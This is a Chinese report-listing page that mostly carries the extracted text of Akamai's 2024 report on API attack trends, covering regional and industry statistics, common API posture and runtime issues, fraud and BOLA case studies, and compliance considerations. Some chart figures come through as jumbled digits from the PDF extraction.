用时:42ms

网络安全行业报告-PDF版

您的当前位置:首页 > 互联网 > 信息安全
  • 西部数据&深安协:2023-2024年度中国安防行业调查报告(74页).pdf

    20232023年行业产值年行业产值据深圳市安全防范行业协会、CPS中安网及乾坤公共安全研究院的调查统计显示,2023年,全国安防产值首次突破万亿规模。2023年全年产值约为10100亿,增长幅度约为.

    浏览量7人已浏览 发布时间2024-05-25 74页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 亚信安全:2024云安全技术发展白皮书(72页).pdf

    1云安全技术发展白皮书云安全技术发展白皮书导读.11.年云计算安全威胁演进.41.1 安全事件层出不穷.41.2 云上资产激增扩大攻击面.51.3 云原生环境的安全险日益增加.71.4 漏洞威胁持续涌.

    浏览量20人已浏览 发布时间2024-05-24 72页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • CSA GCR:2024年ChatGPT的安全影响研究报告(55页).pdf

    2023 云安全联盟大中华区版权所有1 2023 云安全联盟大中华区版权所有22023 云安全联盟大中华区-保留所有权利。本文档发布在云安全联盟大中华区官网(http:/www.c-),您可在满足如.

    浏览量16人已浏览 发布时间2024-05-24 55页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 清华大学&华为:2023年全球DDoS攻击现状与趋势分析报告(47页).pdf

    华为网络安全官网2023年全球DDoS攻击现状与趋势分析天翼安全科技有限公司、联通数科安全、百度安全、Nexusguard、中国移动云能力中心、中国移动卓望公司、清华大学、华为联合发布2023年全球D.

    浏览量17人已浏览 发布时间2024-05-22 47页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 天际友盟:2024供应链安全态势报告(13页).pdf

    双子座实验室2024-042024供应链安全态势报告2024 供应链安全态势报告P3 引言P4 供应链攻击事件及特点P9 供应链安全态势P11 供应链攻击防范措施P12 附录contents目录3引言.

    浏览量42人已浏览 发布时间2024-05-18 13页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • Akamai:2024潜伏在阴影之中-攻击趋势揭示了API威胁报告(34页).pdf

    潜伏在 阴影之中攻击趋势揭示了 API 威胁互联网现状/安全性第 10 卷,第 01 期目录2 为何监测能力很重要4 API:重要的攻击媒介 10 行业趋势突显出供应链攻击的危险性14 合规考虑因素16 亚太地区及日本概况20 欧洲、中东和非洲地区概况25 提升监测能力:企业 API 资产一年回顾29 保护 API 领域30 方法 31 附录33 致谢名单为何监测能力很重要今年是 Akamai 发布互联网现状(SOTI)报告并通过该报告来分享安全研究见解的第 10 年。多年来,随着企业运营方式和威胁形势的演变,这些报告的关注点也发生了变化。从 2024 年开始,我们不再将 Web 应用程序攻击和 API 攻击视为一个主题,而是使用新的数据集,以便 Akamai 研究人员可以将这两种类型的攻击分开研究。在本报告中,我们将关注以 API 为目标的 Web 攻击所占百分比(如需了解更多详细信息,请阅读“方法”部分)。这将有助于我们更好地了解攻击者对 API 进行攻击的方式,并制定行之有效的抵御策略。很多公司最近的一些变革都是基于 API,这些变革改善了员工和客户体验。但遗憾的是,数字化创新和 API 经济的迅猛发展也为网络犯罪分子提供了新的可乘之机。因此,监测能力是 API 安全中一个至关重要的方面。一旦影子 API 或恶意 API 等盲点得以揭示,安全团队就可以开始解决先前未察觉到的漏洞。在 2024 年的第一期 SOTI 报告中,我们将重点介绍以 API 为目标的各种攻击(包括传统 Web 攻击),并通过常见问题领域(例如,可通过数据进行监测的安全态势和运行时挑战)来应对 API 滥用带来的危险。此外,我们将按行业和区域说明这些危险,以便您更准确地评估您公司面临的风险。我们还会提供一些真实案例分析,强化合规要求,并说明法规趋势如何影响您的安全策略。在本报告结尾部分,我们将介绍有助您提升对 API 环境的监测能力的措施,以便增强您的整体安全态势。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 22024 年|报告的关键见解 在 2023 年 1 月至 12 月这 12 个月期间,共有 29%的 Web 攻击以 API 为目标,这表明 API 是网络犯罪分子的重点攻击目标。对 API 的攻击包括开放式 Web 应用程序安全项目(OWASP)十大 API 安全风险清单以及 OWASP 十大 Web 应用程序安全风险中强调的风险,还有使用结构化查询语言注入(SQLi)和跨站点脚本攻击(XSS)等屡试不爽的方法来渗透其目标的攻击者所带来的风险。业务逻辑滥用成为一个严重问题,因为在缺乏 API 行为基线的情况下,识别异常的 API 活动变得尤为困难。企业若缺乏解决方案来监视 API 活动中的异常情况,将面临运行时攻击的风险。例如,数据抓取作为一种新兴的数据泄露媒介,可利用经身份验证的 API 从企业内部缓慢窃取数据。API 已成为当今大多数数字化转型的核心。因此必须了解行业趋势以及相关应用场景,例如会员欺诈、滥用、授权问题和盗刷攻击。企业在安全策略流程中应尽早考虑合规要求和新出台的法规,以避免未来可能需要重新设计策略。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 32024 年|API:重要的攻击媒介 从设计角度来看,API 是数据管道。因此,一旦攻击者通过漏洞利用或针对业务逻辑的攻击等常用手段实现未经授权的访问,API 便可能将数据暴露给攻击者。2022 年,Gartner 预测 API 滥用和数据泄露到 2024 年几乎将会翻倍增长。时间如梭,现在的情况是备受瞩目的 API 事件比以往更加常见。开放式 Web 应用程序安全项目(OWASP)是以其十大安全风险清单而闻名的非营利组织。实际上,去年他们发布了一份专门关于 API 风险的单独清单,名为“OWASP 十大 API 安全风险”,以帮助企业辨识 API 所带来的特有威胁。Akamai 的研究发现,API 正在成为攻击目标,攻击手段不仅包括传统攻击方式,还有针对 API 设计的特定攻击技术,因而需要采取多种保护措施。实际上,我们发现,从 2023 年 1 月到 12 月,近 30%的网络攻击以 API 为目标(图 1)。除非企业能够正确地保护其 API 或摸清其环境中使用的所有 API,否则随着 API 使用需求的增加,这些攻击也很可能会继续增加。了解攻击面的完整范围首先从一份全面准确的 API 清单开始。月度网络攻击次数2023 年 1 月 1 日 2023 年 12 月 31 日图 1:针对 API 的网络攻击从 1 月份的 22%增长到 12 月份的 28%,2023 年 3 月至 5 月期间出现几次波动80 亿次240 亿次200 亿次120 亿次160 亿次40 亿次0 次攻击次数Web 应用程序目标API4 月3 月1 月2 月5 月6 月7 月8 月9 月10 月11 月12 月4潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|此外,我们还在全球范围内观察到一些有意思的趋势,欧洲、中东和非洲地区(EMEA)地区遭受的以 API 为目标的 Web 攻击占比最高(47.5%),紧随其后的分别是北美地区(27.1%)和亚太及日本(APJ)地区(15%)。在国家/地区层面上,遭受此类攻击最多的区域分别是西班牙(94.8%)、葡萄牙(84.5%)、荷兰(71.9%)和以色列(67.1%)。值得一提的是,相比之下美国遭受的以 API 为目标的 Web 攻击仅占比 27.6%。区域攻击情况存在差异的原因有很多,例如监管环境、地缘政治冲突、基础架构类型、入学机会和教育差异、商业模式和社会因素等。但是,还必须注意的是,您可能会发现某个网络攻击趋势最初在一个地区或行业中出现,然后又会转移到其他地区或行业。因此,我们有必要跟踪更广泛的趋势。如需了解区域级趋势的更详细讨论内容,请阅读本报告中的“亚太地区及日本概况”和“欧洲、中东和非洲地区 概况”。API 成为攻击重灾区对攻击者攻击公司 API 的方式以及他们常用策略的研究阐明了您应当关注的防御区域。在过去 12 个月里,HTTP 协议(HTTP)、结构化查询语言注入(SQLi)和数据收集攻击是攻击者青睐的一些手段(图 2)。在 HTTP 攻击中,攻击者会将各种协议中的漏洞用于恶意用途,例如读取敏感数据和欺骗客户端或服务器等。另一种常用手段是活动会话,它与可疑攻击流量在会话期间会被标记和拦截的各种情况有关。对于数据收集,顾名思义,它与搜集或收集信息相关的攻击有关,攻击者可以将收集到的这些信息用在今后的其他攻击中。(如需查看攻击媒介定义的完整列表,请参阅本报告结尾部分的附录。)潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 52024 年|利用我们最新的数据集,我们能够监控针对 API 的更多攻击媒介。典型案例:服务器端请求伪造(SSRF)是我们在去年的 SOTI钻过安全漏洞中提到的新兴攻击媒介之一,可用于获取敏感信息或执行命令。不同媒介的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日图 2:虽然本地文件包含(LFI)不是针对 API 的主要攻击媒介,但它仍然是一个值得关注的领域,因为它可能会被用于渗透预定目标。不过,深入了解针对 Web 应用程序和 API 的攻击分布情况后,可以发现 LFI 仍是主要攻击媒介之一 我们的研究结果还表明,爬虫程序请求是一个值得关注的领域。根据 Akamai 的数据,2023 年全球范围内几乎三分之一的可疑爬虫程序请求都以 API 为目标。虽然这些爬虫程序请求不一定都是恶意请求,但攻击者可以将它们用作攻击手段,执行可能会导致信息盗窃的撞库攻击和数据抓取。我们强调这些类型的攻击是想说明,除了 OWASP 十大 API 安全风险、针对访问的攻击、数据滥用/抓取以及配置错误之外,企业还需要跟踪许多直接攻击并让其渗透测试团队和红队进行检测。API 安全方面的真实经验教训 Akamai 与全球企业开展密切合作,收集与 API 使用相关的详细信息并执行高级行为分析,以识别安全漏洞和 API 滥用迹象。从 Akamai 对 API 活动的看法来说,我们通常会看到 API 活动存在两个截然不同的问题:态势问题和运行时问题。10E5 %0%5%0%数据收集SQLiHTTP活动会话LFIXSSSSRFCMDiRFIWATWPAAPI 攻击所占百分比25.0.1.8C.8%8.6%8.2%7.4%7.1%4.5%4.5%4.5%6潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|1.态势问题与企业 API 实施中的缺陷有关。指示态势问题的告警可帮助安全团队识别并修复高优先级漏洞,提前避免攻击者利用这些漏洞。2.运行时问题是需要紧急回应的主动威胁或行为。虽然这些告警通常在本质上非常关键,但与其他类型的安全告警相比,它们更隐蔽,因为它们采用了 API 滥用的形式,而不是较为明确的基础架构入侵尝试。最常见的态势问题下面列出了我们观察到的最常见的态势问题,并简要概述了这些问题未得到解决时对企业的潜在影响。影子端点 影子端点是过时或旧版本的 API,它们未被停用或未进行文档记录。有时,它们指的是僵尸、恶意或旧版 API,会带来较高的利用风险,因为它们不受企业的标准安全控制措施和方法的约束。未经身份验证的资源访问 未经身份验证的资源访问是指用户或系统能够不提供任何形式的身份验证而访问 API 资源的情况,通常由 API 实施或配置中的缺陷所导致。虽然很多未经授权的资源通过隐匿被隐藏起来,但找到这些资源的攻击者可能会利用它们来访问敏感数据或应用程序功能。URL 中的敏感数据 在某些情况下,可能会在某个 API 请求的 URL 中观察到密码、身份验证令牌、信用卡详细信息以及个人身份信息(PII)等敏感数据。URL 中的数据往往存储在攻击者或许可以访问的位置(例如,存储在日志和缓存中),从而会产生敏感数据泄露和合规问题等重大风险。宽松的 CORS 策略 宽松的跨源资源共享(CORS)策略是指 API 允许超出必要范围的源(例如,协议、域和端口)发出访问请求。过于宽松的策略会让攻击者更容易从不受信任的来源访问敏感资源,以及更容易实施跨站脚本攻击(XSS)等攻击技术。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 72024 年|客户端错误过多 当系统观察到失败的 API 资源请求数量异常高时,就会生成客户端错误过多告警。虽然很多客户端错误是配置错误和其他非恶意错误造成的,但客户端错误过多告警可能表示攻击者正在探测 API 实施以寻找漏洞。最常见的运行时问题对所观察到的运行时告警执行类似的分析时,我们发现了以下代表潜在主动威胁的常见 API 安全问题。未经身份验证的资源访问尝试 该衍生问题比上一节中所述的未经身份验证的资源访问态势告警更加紧迫。在此类问题中,我们发现攻击者未进行适当的身份验证就能够对敏感 API 资源进行明确的访问尝试。即使观察到的尝试未成功,这些情况也表明攻击者在主动尝试寻找并利用 API 漏洞。如果不进行及时干预,此尝试过程有可能最终取得成功。JSON 属性异常 使用异常 JSON 有效负载(例如,意外数据类型、异常大小或过于复杂)的 API 活动可能表示攻击者在主动尝试利用容易受到攻击的 API。此活动可能表示攻击者在尝试执行各种恶意操作,例如注入攻击、拒绝服务、数据外泄或利用 API 逻辑缺陷。路径参数模糊测试尝试 路径参数模糊测试是故意在 API 请求中发送意外或格式错误的数据的另一个示例,重点是 RESTful API 用于指定某些资源或操作的 URL 部分。它是攻击者用于进行侦察以发现潜在易受攻击 API 的另一种技术,可以通过数据外泄或服务中断尝试来攻击这些 API。不可能的时间旅行 在分析 API 活动时,会出现 API 调用的时间戳、地理位置或顺序不合逻辑的情况,这表明攻击者正在尝试通过某种方式来操纵 API。此外,此行为类型有可能表示存在多种可能的威胁,例如欺诈活动中包含的数据篡改。8潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|数据抓取 数据抓取是指以不符合 API 的预期用途和服务条款的方式和数量从 API 中自动提取数据。攻击者往往会缓慢收集此类数据以避免被检测到,并以这种方式窃取知识产权、收集敏感客户数据或获得某种好处。当攻击者在 API 内悄悄进行数据收集时,虽然是少量缓慢的数据抓取,但却可能引发大规模的数据泄露攻击。最后,当您考虑态势和运行时问题时,不妨退一步看看 API 所面临的三种其他更常见的挑战,这可能对您会有所帮助:1.监测能力您是否采取了适当的流程和技术控制措施来确保自己的安全计划能够保护所有 API?这是一个关键问题,因为 API 通常是转型的一部分或嵌入到新产品中,因此许多 API 没有像传统网络业务那样的指导、保护和验证措施。2.漏洞您的 API 是否遵循最佳开发做法?您是否避免了 OWASP 中最常见的编码质量不佳问题?此外,您是否在跟踪和检查漏洞?3.业务逻辑滥用您是否有预期流量的基准?您是否确定了可疑活动的构成 要素?至关重要的是具备对您 API 的监测能力和进行调查的能力,以及能够建立相关流程来快速抵御威胁。不管是面向客户的 API,还是内部 API,都是如此。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 92024 年|行业趋势突显出供应链攻击的危险性API 是企业数字化转型的核心。但是,API 的存在也导致企业面临的风险增加,并且带来了巨大的安全挑战。在报告期内,影响商业行业的企业的 Web 攻击中有 44.2%以 API 为目标,紧随其后的是商业服务行业的企业,相关占比为 31.8%(图 3)。攻击者更倾向于选择商业行业是由多种因素造成的,包括其生态系统的复杂性、对 API 的高度依赖性以及存在大量机密的客户信息。各垂直行业的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日图 3:2023 年商业垂直行业和商业服务垂直行业遭受的 API 攻击占比最高。与欧洲、中东和非洲地区的金融服务业不同,美国的金融服务业尚未采用开放银行业务,因此遭受的攻击占比未进入前五名。应当注意的是,商业服务行业位列第二的原因在于供应链攻击带来的潜在危险。提供商业服务的第三方公司可能拥有与其附属企业相关的机密信息,甚至可以访问其环境,攻击者可能会将这些用作通向高价值目标的路径。对我们的数据进行仔细调查后发现,没有垂直行业能够免受 API 攻击。例如,医疗保健行业的医疗物联网(IoMT)的爆炸式增长和数据互操作性工作推动了 API 的使用。医疗保健行业正面临巨大风险,因为人们尚未完全了解 API 在该行业中产生的安全影响。各垂直行业的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日35E%0 %0%5%视频媒体商业高科技博彩非营利/教育公共部门商业服务制药/医疗保健游戏金融服务其他数字媒体制造业社交媒体API 攻击所占百分比44.21.8&.4 .9.1.0.4%6.2%5.5%3.6%3.2%2.8%2.5%潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 102024 年|案例分析为了让您深入了解我们所看到的针对各行各业的攻击类型,我们提供了几个案例分析,包括这些攻击对企业和客户的真实影响。商业垂直行业的会员欺诈欺诈者以会员帐户为目标,因为这些帐户包含可以兑换为现实世界的商品或现金的高价值货币,例如积分、里程或额度。在某个 API 上,Akamai 检测到有用户访问了五个以上的会员帐户。进行调查时,我们确认了这些帐户中的这种行为是欺诈行为。大多数帐户仅由少量的授权用户访问,因此访问多个帐户的用户可能存在滥用行为。为了帮助减少欺诈,最好了解清楚正常行为与滥用行为之间的区别。SaaS 通知服务中的 API 滥用 Akamai Hunt 团队在属于某个金融服务公司的软件即服务(SaaS)通知系统中发现了 API 滥用问题。有效负载内缺少授权标头和签名,这会阻止该公司检查在系统中发出请求和发送通知的人员。因此,有权使用该 API 的任何人都可能滥用它向公司员工和客户发送消息。潜在的 BOLA 攻击我们的团队在某个航空公司中发现了潜在的失效对象级授权(BOLA)攻击,其中来自近 200 个 IP 地址的已验证用户模糊了 customer_id 路径参数,这会在所提供参数有效的情况下返回敏感的用户信息(图 4)。由于此 ID 是一个简单的整数,参数模糊非常容易,但会造成破坏性影响,因为这会导致客户信息泄露。目标 API 会返回敏感信息,例如名字、中间名、姓氏以及有效身份证、国籍、居住的国家/地区和出生日期。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 112024 年|图 4:当攻击者尝试访问他们无权访问的资源来窃取敏感数据时,便会发生 BOLA 攻击堂而皇之地隐藏起来的盗刷攻击 在另一个案例中,最初是异常的 API 流量,结果却是盗刷攻击。最初,受影响的企业认为 API 流量激增是分布式拒绝服务(DDoS)活动造成的。但是,经过仔细检查后可以确定,该攻击试图验证信用卡,而客户系统会以 true 或 false(即,有效或无效)来作出响应。在盗刷攻击中,攻击者会验证被盗信用卡卡号。一旦验证成功,他们会在暗网市场中出售该信息,或者进行其他欺诈交易。为何必须了解 API 攻击在大多数 API 环境中,常见的业务问题为编程错误或配置错误,这些错误可在 API 安全计划成熟化过程的发现阶段检测到。虽然这些错误中的大多数从未遭到利用,但是在安全团队深入了解 API 资产及每个 API 上运行的流量后,潜在的损害显而易见。涉及 API 的应用程序和业务流程的启动和部署速度往往比安全团队进行相关态势评估的速度更快。这似乎会不可避免地导致配置错误和漏洞。除此之外,大多数企业内部缺乏 API 安全方面的专业知识,因此使得难解的安全问题变得更加扑朔迷离。GET/account/BOLA 攻击GET/account/AliceAlice 的帐户EveEve 的帐户GET/account/T E GAPI 的安全性出现问题的原因使用 API 的关键业务流程的快速部署缺乏对 API 的监测能力错误配置或易受攻击的 API =12潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 2024 年|防止数据泄露的最佳实践随着时间推移而遭到利用的未知 API 漏洞通常与编程错误密切相关。如今,涉及 API 的公开数据泄露事件已经司空见惯,这表明攻击者现在会探索 API 资产并进行侦察来识别要利用的特定 API。这种探索以及数据抓取带来的自动化威胁意味着 API 成为了新的数据泄露攻击媒介。如果攻击者成功实施此类攻击,所产生的后果包括品牌和声誉受损、机密数据丢失和客户信任丧失,以及可能会造成经济损失的合规问题和法规问题(具体取决于您所在的地区)。因此,API 安全比以往更重要。防范通过 API 漏洞进行数据泄露的第一个关键方面是,监控您的环境并了解什么是正常情况以及哪些 API 中包含哪些数据。这包括实施安全控制措施来约束所有 API,并实施自动响应以抵御攻击或向安全运营团队发出告警。接下来,在开发阶段进行左移测试可以从一开始就解决掉漏洞和薄弱环节,从而避免它们被攻击者利用。最后,您需要进行演练,对预防措施和危机应对措施进行验证。Kong 分析人员于 2023 年参与的一项研究表明,“API 攻击目前在美国造成的损失为 106 亿美元。到 2030 年,这一数字将飙升至每年 1980 亿 美元。”API 数据泄露的条件生产环境中错误配置或易受攻击的 API数据抓取自动化威胁(爬虫程序)持续数周或数个月的少量缓慢的数据泄露 =潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 132024 年|合规考虑因素从传统的企业安全和风险管理角度来看,保护 API 并阻断这些作为新攻击媒介的入口点势在必行。近期与安全和数据保护相关的法律和执法趋势发生了变化,这为解决 API 安全和监测能力问题提供了更多令人信服的理由。安全始终是全世界数据保护法律中的重要组成部分没有良好的安全保障便无法实现良好的隐私性。例如,欧盟通用数据保护条例(GDPR)第 32 条规定,处理 PII 的实体“应当采取适当的技术和组织措施来确保其安全水平足以应对相关风险”。加州隐私权法案(CPRA)等其他法律也包含了类似的规定,要求实施“合理的安全程序和做法”以及采取适当措施来保护 PII 的机密性、完整性和可 用性。监管和执法行动同样提高了透明度和问责制的标准。例如,美国证券交易委员会(SEC)近期颁布了针对上市公司的一些新规则,要求披露重大安全事件以及与风险、安全治理和监督相关的详细信息。放眼全球,未能保护 PII 的公司都会面临罚款处罚。例如,SEC 最近对 SolarWinds 的首席安全信息官提起了诉讼,指控其在已知的网络安全风险和漏洞方面存在欺诈行为并未能实施内部控制。该诉讼称,SolarWinds 及其首席安全信息官通过夸大该公司的网络安全实践并低估或未能披露已知风险来欺骗投资者。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 142024 年|因此,虽然很少有专门针对 API 的法律或法规,但很多法律法规都提到了 API 或要求各公司必须遵守相关要求。例如,欧盟的修订支付服务指令(PSD2)和美国的21 世纪治愈法案都在推动实施医疗保健服务提供商使用 API 时必须遵守的透明度要求。所面临的挑战在于,涉及的数据既受到严格监管,又容易成为网络犯罪分子的目标。这促使美国国家标准协会(ANSI)、国际标准化组织和国际电工委员会等组织制定了相关指导原则(ISO/IEC 27001)。支付卡行业数据安全标准(PCI DSS)v4.0 等新法规也对 API 提出了相关要求。在技术方面,开放式 Web 应用程序安全项目(OWASP)是进行培训时的理想参考资源。结论:构建一个可以进行发现、监控、调查和修复的系统,您将能够满足合规要求。随着这些采取法律行动的趋势尝试提高网络安全计划的标准,透明度和问责制也必须继续向更高要求迈进。如果公司缺乏对 API 领域的监测能力,那么与此相关的风险以及安全态势中的相应漏洞可能会带来严重的法律和法规问题,因为您无法保护自己看不到的东西。如需详细了解亚太地区及日本(APJ)以及欧洲、中东和非洲地区(EMEA)地区的 API 攻击趋势,请参阅后续部分中的区域报告。潜伏在阴影之中:攻击趋势揭示了 API 威胁|第 10 卷,第 01 期 152024 年|亚太地区及日本概况亚太地区及日本概况是我们更全面的 API 安全性 SOTI 报告潜伏在阴影之中:攻击趋势揭示了 API 威胁(仅提供英文版)的姊妹篇。请阅读该报告,详细了解攻击者如何利用本期概况介绍中所描述的攻击媒介发起攻击,同时获取有关如何保障贵企业安全的建议以及对我们研究方法的深入说明和新的数据集。亚太地区及日本的 API 攻击值得关注 在利用专门跟踪 API 攻击流量的新数据集进行分析之后,Akamai 研究发现,亚太地区及日本(APJ)遭受的所有 Web 攻击中有 15.0%是针对 API 发起的。在全球范围内,亚太地区及日本(APJ)受到的 API 攻击占比位列第三,仅次于欧洲、中东和非洲地区(EMEA)地区的 47.5%和北美地区的 27.1%。在 2023 年 1 月至 12 月的报告期间内,每个月针对 API 发起的 Web 攻击数量在 11%至 21%之间波动(APJ 图 1)。这一攻击百分比之所以低于其他地区,也许可部分归因于亚太地区及日本的开放 API 市场规模相比欧洲和北美较小,因而企业对 API 的采用率也较低。亚太地区及日本:月度网络攻击次数2023 年 1 月 1 日 2023 年 12 月 31 日 APJ 图 1:即使整体 Web 攻击数据有所增加,以 API 为目标的攻击数量仍然达到 15.0%的平均占比 4 月3 月1 月2 月5 月6 月7 月8 月9 月10 月11 月12 月攻击次数Web 应用程序目标API5 亿次30 亿次20 亿次10 亿次15 亿次0 次25 亿次16攻击趋势揭示了 API 威胁:亚太地区及日本概况|第 10 卷,第 01 期 2024 年|在亚太地区及日本,以 API 为目标的 Web 攻击占比最高的国家/地区依次为韩国(47.9%)、印度尼西亚(39.6%)、中国香港特别行政区(38.7%)、马来西亚(26.4%)、日本(23.4%)、印度(19.0%)、澳大利亚(15.6%)、新加坡(5.8%)、菲律宾(5.5%)和新西兰(4.8%)。API 成为攻击重灾区:流量分析 正如我们之前报告中关于整体 Web 攻击的分析所述,LFI 仍然是亚太地区及日本面临的主要 API 攻击媒介。但是,跨站点脚本攻击(XSS)和结构化查询语言注入(SQLi)相较 API 攻击的排名有所下降(APJ 图 2)。亚太地区及日本:不同媒介的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日APJ 图 2:LFI 仍然是一种主要攻击媒介,而我们的新数据集也揭示了其他颇受青睐的 API 攻击手段新的数据集能够帮助我们发现其他颇受青睐的 API 攻击媒介。例如,命令注入(CMDi)是一种很受欢迎的 API 攻击技术,而我们在 2023 年报告中讨论过的服务器端请求伪造(SSRF)现在也成为了最常用的攻击媒介之一。值得注意的是,活动会话会指出该会话期间的可疑行为,从而导致发生临时阻止。(如需查看攻击媒介定义的完整列表,请参阅全球报告结尾部分的附录。)我们的研究还表明,爬虫程序请求是一个值得关注的领域。在同样的 12 个月报告期内,超过 2 万亿次的可疑爬虫程序请求中有 40%以 API 作为攻击目标。亚太地区及日本:不同媒介的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日5%0 .7%活动会话LFISSRFWATRFIXSSSQLiHTTP数据收集CMDiWPAAPI 攻击所占百分比16.8.8.4%9.1%8.5%8.2%7.9%4.5%2.8%8.5攻击趋势揭示了 API 威胁:亚太地区及日本概况|第 10 卷,第 01 期 2024 年|API 攻击遍布各行各业 在报告期内,Akamai 研究人员发现,制造业受到的以 API 为目标的整体 Web 攻击占比最高,达到 31.2%,随后依次是游戏行业(25.2%)、高科技行业(24.4%)、视频媒体行业(24.0%)和商业(22.3%)(APJ 图 3)。亚太地区及日本:各垂直行业的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日APJ 图 3:制造业遭受的 API 攻击占比最高,部分原因在于这一关键基础设施行业通过 API 建立的连接越来越多,并且供应链中断的可能性也较高 153%9!$0%6%0%3%视频媒体制造业商业服务制药/医疗保健公共部门商业游戏金融服务社交媒体其他数字媒体高科技博彩非营利/教育API 攻击所占百分比31.2%.2$.4$.0.3!.9!.5.0%9.5%3.7%2.8%2.5%2.3攻击趋势揭示了 API 威胁:亚太地区及日本概况|第 10 卷,第 01 期 2024 年|亚太地区及日本概况的相关结论 从安全和风险管理的角度来看,API 的防护迫在眉睫。此外,除了现行的法律法规之外,新推进的改革也要求网络安全立法跟上威胁形势的变化步伐,这都使保护 API 变得势在必行。例如,印度正在起草数字印度法案,该法案将是对信息技术法案的一次重大修订,第一项举措就是于 2023 年 8 月通过了数字个人数据保护法案。澳大利亚于 2023 年 11 月 23 日发布了2023-2030 年澳大利亚网络安全战略,其中一个重点就是确保技术安全、增强对数字产品和软件的信任。此外,在即将发布的支付卡行业数据安全标准(PCI DSS)4.0 版的第 6 节中,特别包含了关于在系统和软件的开发及维护中使用 API 的标准,以降低违规风险。随着 API 越来越广泛地用于交换敏感财务信息,监管机构也正在制定相关举措和政策以加强 API 的网络安全标准。了解最佳实践和指导原则非常重要,这样您就可以将 API 纳入到自己的安全计划中,从而提高监测能力、加强防御措施并遵循合规要求。如需了解更多信息,请参阅全球 API 安全性 SOTI 报告潜伏在阴影之中:攻击趋势揭示了 API 威胁。攻击趋势揭示了 API 威胁:亚太地区及日本概况|第 10 卷,第 01 期 192024 年|欧洲、中东和非洲地区概况欧洲、中东和非洲地区概况是我们更全面的 API 安全性 SOTI 报告潜伏在阴影之中:攻击趋势揭示了 API 威胁(仅提供英文版)的姊妹篇。请阅读该报告,详细了解攻击者如何利用本期概况介绍中所描述的攻击媒介发起攻击,同时获取有关如何保障贵企业安全的建议以及对我们研究方法的深入说明和新的数据集。欧洲、中东和非洲地区盛行的 API 攻击在利用专门跟踪 API 攻击流量的新数据集进行分析之后,Akamai 研究发现,全球范围内欧洲、中东和非洲地区(EMEA)地区遭受的 API 攻击占比最高(47.5%),远高于排名第二的北美地区(27.1%)(欧洲、中东和非洲,图 1)。此数据基于每个地区的 Web 攻击总数,并表明欧洲、中东和非洲地区的 API 比其他地区面临更多危险。各地区的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日欧洲、中东和非洲地区,图 1:欧洲、中东和非洲地区的 API 遭受的 Web 攻击显著高于任何其他地区20P0%0%欧洲、中东和非洲地区API 攻击所占百分比北美亚太地区及日本拉丁美洲8.6.0G.5.1 攻击趋势揭示了 API 威胁:欧洲、中东和非洲地区概况|第 10 卷,第 01 期 2024 年|欧洲、中东和非洲地区的攻击占比之所以相对较高(与其他地区的攻击占比进行比较时),也许一部分原因在于这个地区的开放 API 市场规模相比北美和亚太地区较大,这反映出此地区的 API 采用率更高,而另一部分原因在于开放银行业务和支付卡行业数据安全标准(PCI DSS)4.0 版,它们促进了 API 的使用并且会带来全球报告中所讨论的安全风险。在欧洲、中东和非洲地区,以 API 为目标的 Web 攻击占比最高的几个地区依次是西班牙(94.8%)、葡萄牙(84.5%)、荷兰(71.9%)和以色列(67.1%)。这并不是说这些国家的 Web 攻击总数比欧洲、中东和非洲地区的其他国家更高,而是说由于攻击者重点关注此攻击媒介,这些国家面临的 API 滥用风险更加集中。2023 年 1 月到 12 月的报告期内的月度趋势表明,以 API 为目标的 Web 攻击在欧洲、中东和非洲地区的增长相当稳定,从 1 月份的 34%增长到年底的 41%(欧洲、中东和非洲地区,图 2)。例外情况出现在 3 月和 4 月,当时 Akamai 研究人员发现 API 攻击数量激增,因为在 API 攻击集中度很高的西班牙,商业行业遭遇了大规模的集中攻击。此激增情况表明了攻击者在地区和行业之间转移注意力的速度有多快,因此值得跟踪更广泛的趋势。欧洲、中东和非洲地区:月度网络攻击次数2023 年 1 月 1 日 2023 年 12 月 31 日欧洲、中东和非洲地区,图 2:3 月和 4 月出现例外情况,当时的 API 攻击数量激增,而整个 2023 年 API 攻击数量呈现缓慢增长,到年底在全部攻击中的占比增长至 41 亿次70 亿次50 亿次30 亿次40 亿次10 亿次0 次4 月3 月1 月2 月5 月6 月7 月8 月9 月10 月11 月12 月60 亿次Web 应用程序目标API攻击次数21攻击趋势揭示了 API 威胁:欧洲、中东和非洲地区概况|第 10 卷,第 01 期 2024 年|API 攻击遍布各行各业 在报告期内,Akamai 研究人员发现,在影响企业的全部 Web 攻击中,商业行业遭受的 API 攻击占比最高(74.6%),超过了位居第二的高科技行业(35.5%)的两倍。紧随其后的分别是游戏行业(28.7%)、商务服务行业(24.5%)和其他数字媒体行业(19.7%)(欧洲、中东和非洲地区,图 3)。欧洲、中东和非洲地区:各垂直行业的 API 攻击占比2023 年 1 月 1 日 2023 年 12 月 31 日 欧洲、中东和非洲地区,图 3:商业垂直行业的 API 攻击占比最高,部分原因在于 其生态系统的复杂性、其对 API 的高度依赖性以及此行业中的企业拥有的高价值数据 60p0P 